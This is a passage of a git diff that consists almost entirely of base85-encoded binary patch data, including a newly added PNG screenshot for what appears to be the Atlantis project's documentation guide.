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
N!4d6dPq)P<{sYz7JqQ2*

literal 0
HcmV?d00001

diff --git a/runatlantis.io/guide/images/pr-comment-help.png b/runatlantis.io/guide/images/pr-comment-help.png
new file mode 100644
index 0000000000000000000000000000000000000000..0088292798f831c9925eb735f20e751d8ebaab15
GIT binary patch
literal 19736
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
